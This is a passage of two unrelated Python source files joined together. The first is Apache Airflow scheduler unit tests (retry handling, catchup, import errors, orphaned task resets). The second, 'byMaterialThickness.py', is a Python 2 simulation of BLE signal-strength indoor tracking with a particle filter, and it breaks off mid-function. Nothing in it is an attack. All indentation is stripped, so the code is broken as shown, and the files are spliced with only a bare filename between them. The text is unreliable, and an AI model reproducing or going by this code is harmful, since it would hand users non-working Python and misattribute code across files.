scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1,
**self.default_scheduler_args)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_retry_still_in_executor(self):
"""
Checks if the scheduler does not put a task in limbo, when a task is retried
but is still present in the executor.
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_retry_still_in_executor',
start_date=DEFAULT_DATE,
schedule_interval="@once")
dag_task1 = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use an empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEquals(1, len(executor.queued_tasks))
def run_with_error(task):
try:
task.run()
except AirflowException:
pass
ti_tuple = six.next(six.itervalues(executor.queued_tasks))
(command, priority, queue, ti) = ti_tuple
ti.task = dag_task1
self.assertEqual(ti.try_number, 1)
# fail execution
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 2)
ti.refresh_from_db(lock_for_update=True, session=session)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
# do not schedule
do_schedule()
self.assertTrue(executor.has_task(ti))
ti.refresh_from_db()
self.assertEqual(ti.state, State.SCHEDULED)
# now that the executor queue has cleared, the ti should be allowed to be re-queued
executor.queued_tasks.clear()
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.QUEUED)
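# Recap of the retry flow exercised above: the scheduler queues the task once, the run fails
# and the task moves to UP_FOR_RETRY with try_number bumped from 1 to 2; while the executor
# still holds the task the scheduler leaves it in SCHEDULED, and only after the executor's
# queue is cleared is the task re-queued (state QUEUED).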
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
the try_numbers for a task
"""
dag = self.dagbag.get_dag('test_retry_handling_job')
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
scheduler = SchedulerJob(dag_id=dag.dag_id,
num_runs=1)
scheduler.heartrate = 0
scheduler.run()
session = settings.Session()
ti = session.query(TI).filter(TI.dag_id==dag.dag_id,
TI.task_id==dag_task1.task_id).first()
# make sure the counter has increased
self.assertEqual(ti.try_number, 2)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_scheduler_run_duration(self):
"""
Verifies that the scheduler run duration limit is followed.
"""
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > DEFAULT_DATE)
expected_run_duration = 5
start_time = timezone.utcnow()
scheduler = SchedulerJob(dag_id,
run_duration=expected_run_duration,
**self.default_scheduler_args)
scheduler.run()
end_time = timezone.utcnow()
run_duration = (end_time - start_time).total_seconds()
logging.info("Test ran in %.2fs, expected %.2fs",
run_duration,
expected_run_duration)
self.assertLess(run_duration - expected_run_duration, 5.0)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG with a sys.exit() call doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_ids = [dag_id]
dag_directory = os.path.join(settings.DAGS_FOLDER,
"..",
"dags_with_system_exit")
dag_file = os.path.join(dag_directory,
'b_test_scheduler_dags.py')
dagbag = DagBag(dag_folder=dag_file)
for dag_id in dag_ids:
dag = dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir= dag_directory,
num_runs=1,
**self.default_scheduler_args)
scheduler.run()
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
"""
Test to check that a DAG returns its active runs
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'get_active_runs_test'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag1.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag1.clear()
dr = scheduler.create_dag_run(dag1)
# We had better get a dag run
self.assertIsNotNone(dr)
execution_date = dr.execution_date
running_dates = dag1.get_active_runs()
try:
running_date = running_dates[0]
except:
running_date = 'Except'
self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
"""
Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
three_minutes_ago = now - datetime.timedelta(minutes=3)
two_hours_and_three_minutes_ago = three_minutes_ago - datetime.timedelta(hours=2)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'no_catchup_test1'
DAG_NAME2 = 'no_catchup_test2'
DAG_NAME3 = 'no_catchup_test3'
DAG_NAME4 = 'no_catchup_test4'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
default_catchup = configuration.getboolean('scheduler', 'catchup_by_default')
# Test configs have catchup by default ON
self.assertEqual(default_catchup, True)
# The DAG should inherit the default catchup setting
self.assertEqual(dag1.catchup, True)
dag2 = DAG(DAG_NAME2,
schedule_interval='* * * * *',
max_active_runs=1,
catchup=False,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag2)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag2)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag2)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag2.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag2.clear()
dr = scheduler.create_dag_run(dag2)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last 3 minutes, not 6 hours ago
self.assertGreater(dr.execution_date, three_minutes_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag3 = DAG(DAG_NAME3,
schedule_interval='@hourly',
max_active_runs=1,
catchup=False,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag3)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag3)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag3)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag3.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag3.clear()
dr = None
dr = scheduler.create_dag_run(dag3)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last two hours, not 6 hours ago
self.assertGreater(dr.execution_date, two_hours_and_three_minutes_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
# check @once schedule
dag4 = DAG(DAG_NAME4,
schedule_interval='@once',
max_active_runs=1,
catchup=False,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag4)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag4)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag4)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag4.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag4.clear()
dr = None
dr = scheduler.create_dag_run(dag4)
# We had better get a dag run
self.assertIsNotNone(dr)
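# Summary of the catchup=False behaviour checked above: for a '* * * * *' DAG the first dag run
# is created close to 'now' (within the last few minutes) rather than back at the 6-hours-ago
# start_date; for an '@hourly' DAG it lands within the last couple of hours; and an '@once' DAG
# still gets a dag run created.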
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
try:
dags_folder = mkdtemp()
parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(parseable_filename, 'w') as parseable_file:
parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Generate replacement import error (the error will be on the second line now)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(
PARSEABLE_DAG_FILE_CONTENTS +
os.linesep +
UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Remove the import error from the file
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(
PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
# Rerun the scheduler once the dag file has been removed
self.run_single_scheduler_loop_with_no_dags(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
"""
[JIRA-1357] Test the 'list_py_file_paths' function used by the
scheduler to list and load DAGs.
"""
detected_files = []
expected_files = []
for file_name in os.listdir(TEST_DAGS_FOLDER):
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ['no_dags.py']:
expected_files.append(
'{}/{}'.format(TEST_DAGS_FOLDER, file_name))
for file_path in list_py_file_paths(TEST_DAGS_FOLDER):
detected_files.append(file_path)
self.assertEqual(sorted(detected_files), sorted(expected_files))
def test_reset_orphaned_tasks_nothing(self):
"""Try with nothing. """
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_external_triggered_dag(self):
dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
dr1.state = State.RUNNING
ti.state = State.SCHEDULED
dr1.external_trigger = True
session.merge(ti)
session.merge(dr1)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
self.assertEquals(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
dag_id = 'test_reset_orphaned_tasks_backfill_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
ti.state = State.SCHEDULED
dr1.state = State.RUNNING
dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
session.merge(ti)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
# make two dagruns, only reset for one
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
dr2.state = State.RUNNING
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
self.assertEquals(1, len(reset_tis))
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
self.assertEquals(State.SCHEDULED, ti1.state)
self.assertEquals(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
"""Make sure a task in an orphaned state is not reset if it has no dagrun. """
dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
session.add(ti)
session.commit()
ti.refresh_from_db()
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
dag_id = 'test_reset_orphaned_tasks_no_orphans'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
tis = dr1.get_task_instances(session=session)
tis[0].state = State.RUNNING
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
tis[0].refresh_from_db()
self.assertEquals(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
"""Ensure orphaned tasks with non-running dagruns are not reset."""
dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
tis = dr1.get_task_instances(session=session)
self.assertEquals(1, len(tis))
tis[0].state = State.SCHEDULED
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
"""Create dagruns and esnure only ones with correct states are reset."""
prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
dag = DAG(dag_id=prefix,
start_date=DEFAULT_DATE,
schedule_interval="@daily")
tasks = []
for i in range(len(states)):
task_id = "{}_task_{}".format(prefix, i)
task = DummyOperator(task_id=task_id, dag=dag)
tasks.append(task)
scheduler = SchedulerJob(**self.default_scheduler_args)
session = settings.Session()
# create dagruns
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
dr2.state = State.SUCCESS
session.merge(dr1)
session.merge(dr2)
session.commit()
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
self.assertIsNone(ti.state)
else:
self.assertEqual(state, ti.state)
# otherwise not
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
session.close()
byMaterialThickness.py
from __future__ import division
import numpy as np
import math # for math.ceil
import matplotlib.pyplot as plt
from numpy.linalg import norm
from numpy.random import uniform
from scipy.stats import multivariate_normal # for bivariate gaussian -> brownian motion ( normal with mu x(t-1), and variance sigma )
from filterpy.monte_carlo import systematic_resample, multinomial_resample , residual_resample, stratified_resample
from scipy.optimize import minimize
from scipy.optimize import fmin_tnc
from matplotlib.patches import Ellipse, Rectangle, Circle
import matplotlib.transforms as transforms
from matplotlib import animation
from matplotlib import collections
from numpy.random import seed
from multiprocessing import Process
from collections import deque as col_deque # for the sliding windows
import copy
#from matplotlib.font_manager import FontProperties
import time
from sklearn.cluster import KMeans
from shapely.geometry import LineString
from shapely.geometry import Point
from shapely.geometry import Polygon
#from shapely.geometry.point import Point
import shapely.affinity
import matplotlib.ticker as mticker
from scipy.interpolate import griddata
from scipy.interpolate import interp2d
from matplotlib import rc
import sys
rc('text', usetex=True)
# Object of interest: all variables used for single-object tracking are kept as member variables,
# and all related functions are class methods instead of global functions
if len(sys.argv)!=5:
print "run as 'python <script name> <thickness> <material type> <seed no> <output file name>'"
sys.exit(1)
sizeIncrementRatio=1000/762 # sizeIncrementRatio_small_over_large -> when printing, the small maps end up relatively larger and get resized more, so this has to be handled
#materials=['concrete']
blockWidth=float(sys.argv[1]) # 0.7 = 70cm for example
materials=[sys.argv[2]]
sensitivityOfResult=0.1
maxSignalError=5
numberOfBlocks=2
#blockWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 8
#blockLength=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 12
blockLength=2.5
pastCoeff=0.2
totalNumberOfPeople=1
MinWaitingForPerson=0 # min waiting time between each person
MaxWaitingForPerson=20
totalIterNo=6
NumberOfParticles=300
xdims=(0,5) # our office's coordinates
ydims=(0,3)
#xdims=(0,3)
#ydims=(0,2)
movingLimit=1.0
minUsefulSignal=-90
minSignalValue=-100
numberOfReceivers=3
strongSignalDistance=5
#movingTendency=np.array([0.5,0.2])
movingTendency=np.array([0.0,0.0])
prevMotionRepeatProb=0.75
numberOfRooms=0
#roomWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 8
#roomLength=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) / 6
roomWidth=2
roomLength=5
# roomPositions = [ [6.75,7] ]
OOIWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) /20 * sizeIncrementRatio # beacon representing the person is drawn as circle in the map(ellipse indeed, but looks like a circle due to adjustments)
OOIHeight=OOIWidth
particleWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) /400 * sizeIncrementRatio
particleHeight=particleWidth
# these blocking material positions will be added in main function
# make receivers in square shape
receiverWidth=np.minimum( (xdims[1] - xdims[0]), (ydims[1]-ydims[0] ) ) /30 * sizeIncrementRatio
receiverLength=receiverWidth
receiverPositions=[]
blockPositions=[]
roomPositions=[]
blockMaterials=[]
roomMaterials=[]
WallRoomRatio=0.125 # 0.125: only 1/8 of a room consists of the 2 walls that we cross (the inner area is 14 wall widths of a 16-wall-width total)
# distance is already calculated for our RSSI before taking materials into account, so the empty area inside the rooms needs no special handling
roomWallWidth=roomWidth * WallRoomRatio # express line width in terms of data points instead of axis units
# since linewidth expands the line towards the inside and the outside in equal amounts (so a roomWallWidth/2 distance check from the rectangle boundary is enough for collision checks)
#materials = ['aluminum','iron', 'concrete', 'brick', 'glass'] # blockMaterials and roomMaterials elements are chosen from this list
materialColors = {'aluminum':'silver','iron':'black', 'concrete':'gray', 'brick':'red', 'glass':'aqua'} # https://matplotlib.org/users/colors.html
#material_SignalDisturbance_Coefficients={'aluminum':10.0, 'iron':9.0, 'concrete':8.0, 'brick':7.0, 'glass':3.0 } # signal attenuation per 1 meter in terms of dBm
material_SignalDisturbance_Coefficients={'aluminum':20.0, 'iron':18.0, 'concrete':16.0, 'brick':14.0, 'glass':6.0 } # signal attenuation per 1 meter in terms of dBm
smallestFigureSideInInch=6 # smallest side will be 6 inch
TX_Power=0
rssiAtOne=TX_Power-65
fingerPrintingBeaconPositions=np.array( [ [0.25,2.25], [5, 5 ], [12, 8 ], [11.5, 3 ] ] )
#fingerPrintingBeaconPositions=np.array( [ [0,0], [5, 5 ], [12, 8 ], [13.5,13 ] ] )
fingerPrintingSignalStrengthBeaconsToReceivers=np.array([ [ -76, -73, -86, -82 ], [ -84, -81, -67, -72 ], [ -83, -77, -85, -89 ] ]) # 4 Beacon to each of the 3 receivers
InterpolatedMapForReceivers=None
interpolatedSignalStrenghForAllPositions_forEachReceiver={} # make it a dictionary where the key is 2d position
useFingerPrinting=True # use fingerprinting instead of multilateration; choose the position with the nearest signal value
safetyOffset = 10**-10
OverallError=0
numberOfNotFounds=0
#predefinedPos=np.array([ [0.1,0], [0.2,1], [0.22,1.7], [0.3,2.7], [1.5,2.6], [2,1.7], [2.5,0.2], [3.5,0.15] ])
predefinedPos=np.array([ [0.1,0], [0.2,1], [0.22,1.7], [0.3,2.7], [1.5,2.6], [2,1.7] ])
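# Rough outline of the simulation below (as implemented in this script): receivers are spread
# over the map with k-means, blocking materials are placed at random without overlaps, and each
# tracked person runs in its own process; every iteration the beacon takes a bounded random step,
# per-receiver RSSI values are simulated (including through-material attenuation), filtered with
# a sliding window, converted to distances, and fused by a grid-search multilateration before the
# particle filter predict/update/resample steps are applied in animate().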
def main():
global receiverPositions, blockPositions, roomPositions, blockMaterials, roomMaterials, roomWallWidth
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
#print "processFunction"
seed(int(sys.argv[3]))
print "seed is: " + sys.argv[3]
receiverPositions=getReceiverPositionsToInstall(xdims,ydims,numberOfReceivers)
blockPositions=getBlockPositionsToInstall(xdims=xdims,ydims=ydims,numberOfBlocks=numberOfBlocks) # install blocks without overlapping
#roomPositions=getRoomPositionsToInstall(xdims=xdims,ydims=ydims,numberOfRooms=numberOfRooms,roomBoundary=roomWallWidth/2)
blockMaterials=np.random.choice(materials, numberOfBlocks)
roomMaterials=np.random.choice(materials, numberOfRooms)
AllProcesses=[]
#for i in range(totalNumberOfPeople):
AllProcesses.append(Process(target=processFunction,args=() ) )
for proc in AllProcesses:
proc.start()
sleepAmount=np.random.uniform(low=MinWaitingForPerson,high=MaxWaitingForPerson)
#print "sleepAmount is: " + str(sleepAmount)
time.sleep(sleepAmount)
def processFunction():
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
macID=generateRandomMACID()
while True:
initialPositionOfThePerson=np.random.uniform(low=[xmin,ymin], high=[xmax,ymax], size=(2))
isCollision=False
for blockPosition in blockPositions:
if checkEllipseRectangleIntersection(initialPositionOfThePerson,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
isCollision=True
break
if not isCollision:
for roomIndex, roomPosition in enumerate(roomPositions):
if checkEllipseRectangleIntersection(initialPositionOfThePerson,OOIWidth,OOIHeight,roomPosition,roomWidth,roomLength,boundaryForRect=roomWallWidth/2):
isCollision=True
break
if not isCollision:
break
currPerson = OOI(xdims,ydims,NumberOfParticles,receiverPositions,initialPositionOfThePerson)
iterNo=0
while iterNo < totalIterNo:
animate(iterNo, macID, currPerson, NumberOfParticles,xdims,ydims,maxSignalError,movingLimit,pastCoeff,
minUsefulSignal,minSignalValue,numberOfReceivers,sensitivityOfResult,
strongSignalDistance,movingTendency)
iterNo+=1
def checkIfCoordinateIsInMap(coords,width,height):
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
return coords[0]-width/2 >= xmin and coords[0]+width/2 <= xmax and coords[1]-height/2 >= ymin and coords[1]+height/2 <= ymax
class OOI:
def __init__(self,xdims,ydims,NumberOfParticles,receiverPositions,initialPositionOfThePerson):
# INITIALIZATION STEP, distribute particles on the map
self.particles = create_uniform_particles(xdims,ydims , NumberOfParticles)
self.weights = np.ones(NumberOfParticles) / NumberOfParticles
#beacon_pos = np.array([0.0, 0.0])
#self.beacon_pos = np.array( [(xdims[1]-xdims[0])/4.0,(ydims[1]-ydims[0])/4.0] )
self.beacon_pos=initialPositionOfThePerson
self.prev_walkingNoise=None
self.x_prev = np.zeros((NumberOfParticles, 2)) # prev particles
self.x_pp = np.zeros((NumberOfParticles, 2)) # prev of prev particle
self.receiverPositions = receiverPositions
self.RSSIofReceivers=[] # the RSSI values for this person as seen by our receiver devices
self.UnprocessedRSSIofReceivers=[] # BLE fingerprinting needs the raw (unprocessed) value to compare its results with the received signal (still weakened, since real-life attenuation has to be simulated)
self.distToReceivers=[]
self.prevCovMatrix=None
self.mu=None
self.max_weighted_particle=None
self.slidingWindows=[col_deque([]) for i in range(len(receiverPositions) ) ]
# actually circle-rectangle detection should be done here:
# http://jeffreythompson.org/collision-detection/circle-rect.php
# ensure the person does not go outside the map
# movingLimit is the max step length of the person, e.g. 1 meter per time step
# movingTendency is the tendency of the person to move in a given direction
def move_beacon_in_map(self,xdims, ydims,movingLimit,movingTendency=np.array([0,0]),roomBoundary=0 ):
# iterate over all the blocks; only move if the step intersects none of them
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
xlow = np.maximum(xmin,self.beacon_pos[0]-movingLimit)-self.beacon_pos[0]
xhigh =np.minimum(xmax, self.beacon_pos[0]+movingLimit)-self.beacon_pos[0]
ylow = np.maximum(ymin,self.beacon_pos[1]-movingLimit)-self.beacon_pos[1]
yhigh =np.minimum(ymax, self.beacon_pos[1]+movingLimit)-self.beacon_pos[1]
while True:
walking_noise_x = np.random.uniform(low=xlow,high=xhigh) # human motion undeterminism
walking_noise_y = np.random.uniform(low=ylow,high=yhigh)
#walking_noise = np.zeros(particles.shape)
